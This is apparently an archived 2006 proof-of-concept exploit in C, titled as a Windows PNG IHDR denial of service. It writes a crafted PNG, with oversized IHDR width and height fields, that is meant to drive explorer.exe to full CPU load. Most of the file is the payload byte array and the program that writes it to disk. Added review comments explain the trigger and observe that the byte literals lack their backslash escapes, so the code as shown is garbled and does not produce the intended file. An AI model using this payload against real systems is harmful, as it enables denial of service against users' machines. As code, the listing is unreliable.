
# Title : MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)
# Published : 2006-08-18
# Author : vegas78


// Microsoft Windows PNG IHDR block DoS PoC (2) 
//
// CPU load goes to 100% until you restart explorer.exe
// 
// Bug found by: Preddy (?) 
// 
// Compiled and tested on Windows XP SP2 with Visual Studio 6, no PSDK
//
// Header: 89 50 4e 47 0d 0a
//
// Greets: scoper, [H]Corny, eleet aka takker01 and [...]


#include <windows.h>
#include <stdio.h>
#include <conio.h>

/* Output file name. main() opens it with fopen(..., "wb"), so it is created
 * relative to the current working directory and an existing file of the
 * same name is truncated. */
#define PNG_NAME "bla.png" 

/*
 * File image that main() writes to PNG_NAME. Despite the name, this is not
 * executable shellcode: nothing in this file runs it, it is only copied to
 * disk.
 *
 * NOTE(review): as listed here the string literals carry no backslash escape
 * prefixes, which looks like an artifact of how the page was extracted.
 * Compiled as shown, every "x89" is three ordinary characters, so the output
 * is ASCII text and not the PNG that the file header describes.
 *
 * Read as hex pairs, the data opens with the PNG signature and an IHDR chunk
 * (49 48 44 52) whose width and height fields are both 00 00 ff ff, and it
 * closes with an IEND chunk. Presumably those IHDR values are what the
 * affected parser mishandles -- the title names the IHDR block, but nothing
 * else on this page confirms it.
 *
 * For triage: a file scanner can flag PNGs whose IHDR dimensions are
 * implausibly large before the file reaches a decoder.
 */
char shellcode[] =
"x89x50x4ex47x0dx0ax1ax0ax00x00x00x0dx49x48x44x52"
"x00x00xffxffx00x00xffxffx08x00x00x00x00xc3x07xf1"
"x5cx00x00x00x07x74x49x4dx45x07xd6x02x0ex0fx25x12"
"x82xbax97x53x00x00x00x09x70x48x59x73x00x00x0axf0"
"x00x00x0axf0x01x42xacx34x98x00x00x00x04x67x41x4d"
"x41x00x00xb1x8fx0bxfcx61x05x00x00x09x4dx49x44x41"
"x54x78xdaxcdx9dx41x6cx1bx45x14x40x27xffx00x00x00"
"xffx00xffx00x00x00x00xffxffx00xffx00xffxffxffxff"
"xffxc8xa8xbdx94x0axc9x2dx1cx20x70x71x7axffxffxff"
"xffxffxffxffxffxffxffxffxffxffx00x4dx0ex75x55x55"
"x4ax72x31x6ax39xd8x85x83x5bx09xd2x14x55xc8x2bxa1"
"x26x15x48xd8x16x12x69x00x01x2ax62x59xefx7axd7x5e"
"x7bx76xfexffx33x63x36xffx14x7bxffxeex3exffx99xff"
"xe7xcfxccxdfxcdx98xcdx02xf9xe7xc7xdfxd8x36x91xc7"
"x8cx9dxbdx0fxc1x9fxf6xf7xe5xefxbexf9x3dx6exb6x80"
"xf1xe9x97x5ex7dx22xf8x64xbbxf2xc7xd7xefx3cxa1x70"
"xc9x11xc8xd8xfex53x77x1ex78x70x1exe3x0fx47x1fx8d"
"x9bx89x23x8fxbfxbbxd5x63xfcxe1x85xb8x71xf8xb2xe3"
"xe4x96xcfxb8x5dx11x7dx48x87xf1xefxd7xe3x46x11x40"
"xcex7bx8cxd5xedxd8x17x7dxd9xffx73x87xf1xdfxb7xa3"
"x8ex1bx99xb8x09x9dxd8x78xb1xc3x78x27x32xe8x64xec"
"x7ax36x6ex46x36x75xdfx61xfcx30xf2x70xc6xe9x0bx8d"
"x9cx11x2fxe3xaexaaxcdxfex8cx76xeax8cx1bx9dxe2xb6"
"x65xc1x66x5bx07x22x8fx26xbdx30x6fx57x92x71x32xbe"
"xf0xa7x88xd1xb4x7dx29x9axf1x31x1exd8x7ax08xa5x37"
"x7bx3dx3fxaax6ex99x2cxe4x40x1dx81x1dx59xd3xeex49"
"x63x24xddx32x5bx6fxdax15xb1xcax81x2dx34xa3xd3x2d"
"xb5x37x78xb6xeex3axa5x12x63x23xc4x68x37x0bx5ax1b"
"x3cx59xeexb6x90x12x63xd9x1ex90xbax46x0fxcfxfbxad"
"xd4x10xffx72xc0x67x36x07xbfx48xddx28x6ax32xa5x59"
"x39x93xe8xfexb9x17x54x16xd9x31x6bx0fx4bx43x8bx29"
"x33x7dxddxa8x29xeexe7x80x1dxefxf1x0cxb0x92x57x47"
"xccx5dx25xf9x9fxc8x8ex46xc3xe6x49x59xb1xbdx8dx62"
"xd8x15x95xecxd8xaex72xbfx3exf1x95x5axd2x76x6ex96"
"xa6x2fx1ex67xd6xf8x5fx9bx8bx2axedx5dx3ex41x3dx43"
"xd4xd6xccx68xdax11x52x91x6dx6fx63x28xa0xa9xb5x35"
"x6bxafx46x1dx39x2cxdbxdexe7xc8x56x04xdax9ax95x22"
"x8fx98x8bx70x2exc0x91x02x1dx11x68xebxc1x21x5bxd9"
"xbfx73x9cxcbx28xb6x35x63x4bx82x63x27x56xa8xf1x3c"
"xf3x81x84x15x41x3bx9ax22x43xdax4dx5axa7xe4xc7x5b"
"x65x3bx5axabxa2xa3x89xabxa4x20x54xe2xd3xfcxaax68"
"x47x96x14x1axd2x99x46xe0x3bx65x9ex7fx05x30xefx01"
"x19x87x13x34x59xcfx89xeax36x6axf9xa3xf0xd2x81xd4"
"x91x90x75x5bx92x11x9ex73x59x17x00x85xd4x0ax2ax89"
"xc9xa5x22x0ex80xddx11xb6x63x54xf6xd3x6fx09x04x64"
"xf4x55xcaxeax76x64xedx37x5bx80x86x79x1dx0ex94x73"
"x91xbfx63x03x3ax15x33xbfxbex39x0fx69x24x3ex87x20"
"xcdxb7x22x0fx6dx02xa7xa2x18xd9xd9x4bx90x86xb9x02"
"x44xf3xf7x12x91x87x40x46x44x7fxecx48x05xeax92xc0"
"x90x63x08xcex04x7ex1dx76x2dx85xcdx59x90x46x62x51"
"x74xafx39xc1xb1x7bx0cx12x9cx1dx83x35x34x39x4bx0a"
"x43x03x70x67xb4x1dxd9xcdxe3xa0x4axe2x6ax24x64x5a"
"x10x9cxa0xa0x81xf4x99x8ex5cx3ex05xebx2cx46xadx5b"
"x1dx12x9cxb4xaex8fx91x9dx3dx0fxaax24x3exe6x87x20"
"x23x2dx38x09x1ex66xf0x8cxecxe4x17x30x24x7fx58x1c"
"x4fx09xcexb9xadx93x91xcdxc8x42xeex13x9dxb2xa1x95"
"xb1x3dx73x03xd4x31x79x90xd3xa2x33x74xf6xc7x0exe4"
"x51x30x4cx32xb3x34x9cxaax1dx14x9dx00x87x47x12xa3"
"x03x09x5bx32x35x0cxf9x94x40xddxd2xeax33xeex15x11"
"xcdx7dxf8xdcxe0x37xa2x15xc6x5fxdbxbax19x99x75x14"
"x76x9cx13xc5xf0x67x23x21x50x5ex63xa0x50x19x1dxc7"
"x01x93x20x36x1bx5exc2x98x10xe9x6ex8cx80x91xb5x5f"
"x83x47x9cx0fx42xa3xe2x1ex91xeaxadx51x30x3ax23xce"
"xcbx90x7bx27x16xfbx23x90xc8x8ex2dxd8xadxa5x18xd9"
"x35xb0x53x26x4axc8x4bxadxc3xd1x4cx8ex91x59x47x4e"
"x01xe9x4axaax88xbbx52x0dxa1x23xc7xe8xb4x37x64xca"
"x3exbfx11x85x9ex65xccxcdx90x39x2ex47x72xe2x39x6d"
"x33xc8x81x8axd1x4ax0dxf8x36xf8x1cx97x23x0bxcfx0b"
"x1bx3cxf1x91x3fxdex08xecx08xadx2fxa8xdax91x75x76"
"x31x44x0bx2dx7ex97x8cx5ex31x6ax22x16x0fx30xebx3d"
"x62x49x8ax96xacxbax5dx32x7ax52x59x41xdcx41x9dxd1"
"xa1x8cx46xe8x76xc9x68x05xccx12xabx0ex46xc6x32x91"
"x10xdexd2x62xe4x61x8cx19x35x31x0ax28xcbx42x46xd4"
"x72xbax2exc6x68xcax9cx80x11x17xe6xf5x31x3ax94x65"
"x9ex8fx77x3cx37xc2xadx1axb8xb5x55x9dx8cx8exf7xf0"
"x22x51x25x92x11x59x44xa2x97xd1x99xccx14x9ax1cx14"
"x7ex5bx23x07x74xedx8cx4ex54xcfx0fx8ex90x8dx3cx37"
"xcex23x5bx5ax71x2cxe4x22x4exacx5fx18x18x20xcdx33"
"xbcxa9x42xebx4dx78x1exe3xcbx4exb4x26x48x37xf9x64"
"x7ax7cx6fx02xa9xfexfex4dxfcxa5xb5x30x1ax93xd3x07"
"x9fxc1xd2xb9x72x6ax81xa0xacxcex68xa6xd3xd3x24x3e"
"x47xcex9fx25xa9x2bxfax4cxa6x02x6dx31x29xb8xb4x2b"
"x8ax7ex6dxe4xeax74x40xeaxbexb7x1ax63x0exdcx5cx52"
"xb7xa2x1ax63x46x8exb0x49x2dx69x91x67x34x8ax52x84"
"x41xdex4bx61x94xf4xebxe4x47x29xb9x13xd9x93x12xe7"
"x48xd9x31x23xe1xccxbexfcx4fx6dx9dx53x40xb4x9bxc4"
"xa2x59x39xc6x9cx02xa1x8dx9bx0cx86x18x25x72x8ax2c"
"xbcx09x22x94x44x89x58x17x44xf7x99xccxc7xe1xcfxd6"
"xadx8dxbdx93x24x0fx4axcdx9dxa6xddx92xdaxd6x03x5b"
"x7fx4dxefx79x86x2cxadx87x52xcax82x24xfax63x38xa9"
"x0exf6x31x4dxd2xa8x58x27xdcx90xcex38x50xa3xd3x1b"
"xd7x10x1bxb3x7dx42x88xe4x64xc6xc1x42x9axbex38x02"
"x6fxc3xf7x09x7axa6x20xe1xd7xf3x03x99x62x5fx9dxc1"
"x75xd2x6fx3dx46x50xa6x31x66x0ex0fx7cx31x41x3axbd"
"x4fx66x08xf1x87xc6xf8xdexd0xadx7ax7fx4ex92xaex94"
"xa2xa8x53xfax63x66xb8x63x05xa3x2fxcdx67xc0xcaxa3"
"x9ex10x7dx86xb7xe0xd0x7dxb0x26x49xcdx26x9bxf8xf9"
"x35x65x9cx31x78x7bxbcx67x5ex59xaexb1x7dxd3xc7xa8"
"xd3xaexc4xe4x35xacx2ax85x31xcdxe5x48x49x66x92xd3"
"x68x46x8axcfx4cx13x74x61xc1x47x1fx0axe3x3ex82x2e"
"x2cx7bxd1x29x1ax85xf1x19xadx8cx89x83x58x4dx0ax23"
"xd5x2dx00x19x1fx05xa3x66x49x8fx82x11xaexbax22xc9"
"x1exacx22x85x71x95xa0x8bx90x71x6cx14xa7x30x22xb6"
"xc3x49x8cx58x45x0ax63x95xa0xabx53x28x8cx35xcdx1d"
"x72x14x8cx6dxdcx4ex2ex56xe0xe7x0ax25x18x59x29x1e"
"x43x92x18x2dxb0x08x9bx22x70x3dxb3x0cx23x3bx0bx57"
"x72x8dx40x88xe3xccx4cx1cxadx4dxadx89x7bx43x1fx24"
"xa2x1ax4ex8ax91x5dxd3x07xb9x81x55x24xe7x14xd7xde"
"x40x54x36xa1x64x44x3exe3x42x22xaax0bx51xb2x31x3a"
"x46x66xcdx9cxd1xd2xdex70x21xaex3cx23x6bx9fxd6x61"
"x4ax4cxc5x9ex3cx23x63x37x8fxccx2axf7xcaxcdx91xda"
"xb1x23x0bxcfxcfx2ax36x38x3axf4xc8xcfx15xdax0bx07"
"x66x95x46x9dx1ax5ax53x61x3exd3x5ex78xf6xe5x4bxf2"
"xc6x44x14xb9xfaxa2xb8x37x6cxe4xcax92x9bx35xf8xf5"
"x1ex0dx35x1fx46x56x06x13x51xf9xa8x91xb1x83x49xdf"
"xc7x46xefx10x6bxabx4bxa1xafxe7x12x26x47x7ax18xd3"
"xe4x25x8cx56xedxffx66xa4xacxc0x7bxb2x8ax2fxefxd1"
"xc4x78x88x7cx46x89xa0xabx85xd1x44x4fxf1x7cx39x7f"
"x99xa0xacxadx4ex8ax22xd6x12x69x53x73x64x8cx37x58"
"xc4x1axb4x55x5dx5ax23x74xc6x91x31x5ax4bx25x2bxc9"
"x1bxcdxadx6ax89x50x68x36x3axc6x56x75xa9xc6x35x14"
"xddx82x1ax19xadxf5x5ex7cx6cx5dx28x79xa9xe5xc0xf2"
"xa2x63xc1x75x19x40x35xc6x0cx0bxacxb2xdcxedx7bxad"
"xd5x52x60xc2xbexa1xa7xb5xb9xb4x4cx6fxe2x9exc8x8f"
"xd7x0dxbbxe1xbfx3dxcex7bxebx5dxa3xe0x16x53x9bx59"
"xf7xdbx82xbfxa1x55xc9x2bxbdx82x4ax29xa7xe8x24x3b"
"x3ex65xd1xb6xebx5exd5x42xa7xbcx39x1bx30x36x8axca"
"xefx66x54x61xecx3ex9axeex15x54x18x79x77xb7xc5xf4"
"xaax71xddx8dx4ex33x97x4dx0exf1x19x66x26x5fxacxd7"
"x29x65x71xcax76x74x6dxe5x17x03x04xb5xd7x5cx04xc3"
"xccx16x2ax8dxaex06xa1xe8x43x83x1dx3bx52xcfx84x6b"
"x21x87xf6x7dx8dx64x3exc0x73x85x54x4fxa1x25xf6xa4"
"xaexb6xd6x27xfaxd2xb3x50xd8xe1x16xebxd6x28x97x97"
"x67x0cx05xbbx44x08x22x78xbexd5x98x3cx34xc5x29x26"
"x6excdx93x66xe7x0ax76xb4x22x37x25xbdx03xc6x5cx7a"
"x82x93xfbx5axb7x6ax35xdax02xc2x68xc6x6bxc3x31xb2"
"xb1x32x98x54xb4x36xefxdexaexdexa3x2fx70x28x30x0a"
"x1ex4ax9ex70x18xc7x43x73x1cxebxeexedx5bxb7xf1x4b"
"x13xbax18xd7xfaxedxd4x0axedxcaxeexe9xffx09x2ax78"
"xcax8cx01xdfx92x93x70x19xe9xb9x1ex73x27x2fx6fx57"
"xa7x37xefxdex5bx5bx97x4ax75xc2x22x1fxc3xbbxafxa6"
"xadxfbxa3x9dxd1x7bxc0xc3xabxa8xd1xf3x3ax4bxa5x71"
"xc6x9dxf8xd7xfbx47x8cxa4x1fxc6x0bx5axe8x34x30xb2"
"x6cxb3x3cx90xd1xf8x15xd9x3ax19x8fx3dx60x0fxe8x73"
"xe3x1exd2xf0x57x5ex39xb1x4exc6x4fx6dx66x7fx36xa6"
"xf1x82xddx47x22x35x32x8ex7fxebx30xfexb4x5fx2bxa3"
"x9bx4bx4axbdxd2x90x2fxc7xffxeexbcx2bx1exf1x42x19"
"x9ax64xb1x6fx3cx43xc8xaex2fxddxf7xd9xdfxd9x66xff"
"xfdx21x24x53xf7x5dxc6x7fx4fxefx88x9bx24x52x76x5f"
"xb1xbdxffxafxb0x75x72xbbx42xeexfexe4x9fx2exe3xb6"
"x85xf4x10xbbxffxefx63x6bx7ex7fx2cx8bx53x42x79x78"
"xeax8ax8bxd8x65xb4xedx9fx2fx4exedx8ax1bx2ax24xe3"
"xc7x97xefx77xd9xc6x82x57x77x6dxadxdexf8xf2x97xb8"
"xc9x7cxd9xf7xdcx8bx4fx3fxecx7fx18xebx7fxbdxd8x5f"
"x0fxe2x66xf3xe5x91xfexaexf7x1fx3ax53xb1x09xddxaf"
"x0exbax00x00x00x00x49x45x4ex44xaex42x60x82x00";

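/*
 * Write the contents of the shellcode[] array to PNG_NAME and report the
 * outcome on the console.
 *
 * Returns 0 when the whole array was written and the file closed cleanly,
 * 1 when the file could not be created or the write/close failed. Each exit
 * path waits for a key press (getch) so a console window opened just for
 * this program stays readable.
 *
 * The file is created in the current working directory and any existing
 * file with that name is truncated.
 */
int main(void) {
    /* sizeof counts the literal's terminating NUL, which is not part of the
     * file image, hence the -1. */
    const size_t image_len = sizeof(shellcode) - 1;
    FILE *out = fopen(PNG_NAME, "wb");
    int status = 0;

    if (out == NULL) {
        printf("Unable to create file %s", PNG_NAME);
        getch();
        /* The listing called exit(0) here, reporting success to the caller
         * although nothing was written. */
        return 1;
    }

    printf("Creating PNG file\n");

    /* One bounded write instead of a per-byte fputc loop whose int index was
     * compared against an unsigned sizeof; a short write is now detected. */
    if (fwrite(shellcode, 1, image_len, out) != image_len) {
        status = 1;
    }

    /* fclose flushes buffered data, so its result decides whether the bytes
     * really reached the file. */
    if (fclose(out) != 0) {
        status = 1;
    }

    if (status != 0) {
        printf("Failed to write file %s\n", PNG_NAME);
    } else {
        printf("PNG file %s successfully created..\n", PNG_NAME);
    }
    getch();

    return status;
}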
